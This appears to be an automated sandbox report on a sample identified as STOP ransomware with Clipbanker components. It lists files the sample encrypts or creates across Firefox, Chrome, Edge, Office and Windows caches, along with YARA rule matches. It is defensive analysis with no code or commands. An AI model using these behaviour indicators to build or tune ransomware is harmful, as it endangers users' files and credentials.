Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.9960080325	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99476410636	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99602382989	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99178599209	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.99067584929	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.99439986334	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99414591782	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.99651977317	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.99467608327	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99621652998	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99385140849	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99764362337	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99305066628	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99084256777	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.9971489212	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99667691503	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.9928209279	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99263174498	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99327515278	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99293116462	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm entropy: 7.99004983018	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99579463377	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db entropy: 7.99836046394	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99828526512	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99746370243	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99830767577	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99318632795	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004610890001.txt entropy: 7.99828637199	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004157646270.txt entropy: 7.99827022955	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003693874026.txt entropy: 7.99807211295	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003495205506.txt entropy: 7.99831997499	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409000886124092.txt entropy: 7.99825643098	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005389384955.txt entropy: 7.99828939122	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005089393222.txt entropy: 7.99833301935	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004786866416.txt entropy: 7.99829145068	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021833987004.txt entropy: 7.99846943371	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409021046094069.txt entropy: 7.99848094586	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409010467962588.txt entropy: 7.99818740675	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409009155626780.txt entropy: 7.99850295617	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006446553451.txt entropy: 7.99814816717	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006148184320.txt entropy: 7.99824848068	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005953011714.txt entropy: 7.99829643194	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024501033688.txt entropy: 7.99850770942	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99728067642	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409024089824579.txt entropy: 7.99856417918	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409023789902202.txt entropy: 7.99839399505	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409022763610746.txt entropy: 7.99831720831	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133584364071005184.txt entropy: 7.99859197767	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite entropy: 7.9984222857	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99642220294	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.992943882	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99065557408	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99455572881	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99770393999	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr\strings.json entropy: 7.99115520252	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json entropy: 7.99084495125	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json entropy: 7.99719475939	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json entropy: 7.99753009846	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json entropy: 7.99730392153	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json entropy: 7.99713403473	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99750571507	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.99166548014	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json entropy: 7.99688582548	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json entropy: 7.99698964247	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json entropy: 7.99609284479	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json entropy: 7.99710501012	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json entropy: 7.99781048708	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json entropy: 7.9969215659	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json entropy: 7.99722470422	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json entropy: 7.99679960098	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json entropy: 7.99720979812	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json entropy: 7.9972655815	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json entropy: 7.99716163926	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0\edge_tracking_page_validator.js entropy: 7.99606191629	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99748062323	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js entropy: 7.99387776697	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb entropy: 7.99693029534	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb entropy: 7.99181351959	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb entropy: 7.99684390895	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb entropy: 7.99623942596	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb entropy: 7.99849356667	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb entropy: 7.99845585301	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb entropy: 7.99840313742	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb entropy: 7.99505328764	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgzq (copy) entropy: 7.9971489212	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgzq (copy) entropy: 7.99667691503	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgzq (copy) entropy: 7.9928209279	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgzq (copy) entropy: 7.99263174498	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgzq (copy) entropy: 7.99327515278	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgzq (copy) entropy: 7.99293116462	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.bgzq (copy) entropy: 7.99836046394	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.bgzq (copy) entropy: 7.99828526512	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgzq (copy) entropy: 7.99746370243	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.bgzq (copy) entropy: 7.99830767577	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgzq (copy) entropy: 7.99318632795	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgzq (copy) entropy: 7.99728067642	Jump to dropped file
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199673019888[1].htm entropy: 7.99410276149	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.mstsca.exe.8f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.mstsca.exe.8f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.mstsca.exe.8f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.mstsca.exe.8f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
